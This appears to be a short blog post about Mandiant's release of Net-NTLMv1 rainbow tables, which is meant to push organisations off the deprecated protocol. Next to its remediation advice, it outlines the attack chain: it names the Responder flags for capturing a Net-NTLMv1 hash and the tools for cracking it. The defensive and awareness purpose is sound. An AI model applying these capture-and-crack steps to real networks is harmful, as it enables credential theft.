Introduction
Mandiant has released a comprehensive dataset of Net-NTLMv1 rainbow tables to emphasize the urgency of migrating away from this outdated protocol. Despite being deprecated and known to be insecure for over two decades, Net-NTLMv1 remains prevalent in active environments, leaving organizations vulnerable to credential theft.
Background
Net-NTLMv1 has been widely known to be insecure since at least 2012, with cryptanalysis dating back to 1999. The release of rainbow tables allows defenders and researchers to recover keys in under 12 hours using consumer hardware, highlighting the need to disable Net-NTLMv1 and prevent authentication coercion attacks.
Dataset Release
The unsorted dataset can be downloaded using gsutil, and the SHA512 hashes of the tables can be checked for verification. The password cracking community has already created derivative work and is hosting ready-to-use tables.
Use of the Tables
Once a Net-NTLMv1 hash has been obtained, the tables can be used with rainbow table searching software such as rainbowcrack or RainbowCrack-NG. The Net-NTLMv1 hash needs to be preprocessed to the DES components using ntlmv1-multi.
Obtaining a Net-NTLMv1 Hash
Attackers can use Responder with the --lm and --disable-ess flags to obtain a Net-NTLMv1 hash. The hash can then be cracked to retrieve password hashes of users or computer machine accounts.
Remediation
Organizations should immediately disable the use of Net-NTLMv1 by setting the LAN Manager authentication level to send NTLMv2 response only. Monitoring and alerting of when and where Net-NTLMv1 is used is also necessary.
Lessons Learned
The release of the Net-NTLMv1 rainbow tables highlights the importance of migrating away from outdated protocols and the need for continuous monitoring and remediation to prevent authentication coercion attacks.
Where curiosity meets code and security meets strategy.
Recent Comments
No comments on this post yet.